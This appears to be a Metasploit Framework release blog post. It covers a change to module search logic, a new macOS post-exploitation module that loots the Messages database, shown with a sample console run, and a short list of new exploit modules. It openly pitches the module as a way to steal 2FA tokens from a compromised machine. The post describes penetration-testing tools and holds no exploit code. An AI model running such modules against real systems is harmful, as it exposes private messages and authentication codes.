For a very long time,
search command has used a union of the results of all search terms. This means that if you do something like
search linux firefox, you'll get a list of all modules that mention linux, regardless of the application they target, and all modules that mention firefox, regardless of their platform. Most people are probably expecting the intersection, i.e. you probably wanted to see only the modules that target Firefox on Linux. So now that's what happens.
The exception is when you have two or more of a single keyword operator, like
search arch:x86 arch:mips. That will still get you the union of those two, since arguably it makes more sense to see results for both in this case.
This release brings a new post module from Geckom:
post/osx/gather/enum_messages, a module for gathering messages from the Messages app in OS X. With the ability to connect your phone to the Messages app, this module provides an easy way to steal 2FA tokens and other goodies from a connected phone, assuming you have an active session on the target machine.
The module supports a few operations:
DBFILE for grabbing the SQLite DB directly,
READABLE for collecting messages in a human readable format,
LATEST for collecting only the latest message, and
ALL for doing all of the above.
Here's an example of what to expect:
msf > use post/osx/gather/enum_messages msf post(enum_messages) > set session -1 session => -1 msf post(enum_messages) > run [+] [redacted]:56791 - Messages DB found: /Users/[redacted]/Library/Messages/chat.db [+] [redacted]:56791 - Found Messages file: /Users/[redacted]/Library/Messages/chat.db [*] [redacted]:56791 - Looting /Users/[redacted]/Library/Messages/chat.db database [*] [redacted]:56791 - Generating readable format [*] [redacted]:56791 - Retrieving latest messages [+] [redacted]:56791 - Latest messages: [+] [redacted]:56791 - messages.db stored as: /Users/[redacted]/.msf4/loot/20161207151127_default_[redacted]_messages.db_947304.db [+] [redacted]:56791 - messages.txt stored as: /Users/[redacted]/.msf4/loot/20161207151127_default_[redacted]_messages.txt_801211.txt [+] [redacted]:56791 - latest.txt stored as: /Users/[redacted]/.msf4/loot/20161207151127_default_[redacted]_latest.txt_986021.txt [*] Post module execution completed msf post(enum_messages) >
That's all there is to it! You can change the user to retrieve messages from by setting the
USER option, or you can let the module work against the current user. If you want to retrieve more than three messages, you can change that with
Exploit modules (2 new)
- PDF Shaper Buffer Overflow by metacom, and metacom27
- Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) by Matt Graeber, Matt Nelson, and OJ Reeves
Auxiliary and post modules (2 new)
- WordPress Symposium Plugin SQL Injection by Matteo Cantoni, and PizzaHatHacker exploits CVE-2015-6522
- OS X Gather Messages by Geckom
As always, you can update to the latest Metasploit Framework with
msfupdate and you can get more details on the changes since the last blog post from GitHub: